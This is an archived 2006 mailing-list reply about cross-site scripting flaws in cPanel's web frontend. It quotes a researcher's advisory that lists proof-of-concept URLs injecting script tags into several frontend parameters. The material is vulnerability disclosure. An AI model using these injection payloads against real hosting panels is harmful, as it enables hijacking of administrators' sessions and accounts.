On 3/13/2004 I notified cPanel that they had major XSS issues in their backend... beyond what I was actually sending them or documenting, and they should fix them. They agreed.<br><br>However, based on this, it doesn't look like they've done much in the two years since I posted:
<br> <a href="http://www.cirt.net/advisories/cpanel_xss.shtml">http://www.cirt.net/advisories/cpanel_xss.shtml</a><br><br><br><div><span class="gmail_quote">On 2/2/06, <b class="gmail_sendername"><a href="mailto:simo@morx.org">
simo@morx.org</a></b> <<a href="mailto:simo@morx.org">simo@morx.org</a>> wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
Title: cPanel Multiple Cross Site Scripting<br>Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org><br>Affected scripts with proof of concept exploit:<br><br><a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=">
http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=</a><script>alert('vul')</script>&domain=<br><a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=">
http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=</a><script>alert('vul')</script>&domain=xxx<br><a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0">
http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0</a>"><script>alert('vul')</script><br><a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=">
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=</a>"><script>alert('vul')</script><br><a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx">
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx</a>"><script>alert('vul')</script>&target=xxx<br><a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006">
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006</a>"><script>alert('vul')</script>&domain=xxx&target=xxx<br><a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan">
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan</a>"><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx<br></blockquote></div><br>-- <br><br>
<a href="http://www.cirt.net">http://www.cirt.net</a> | <a href="http://www.osvdb.org/">http://www.osvdb.org/</a>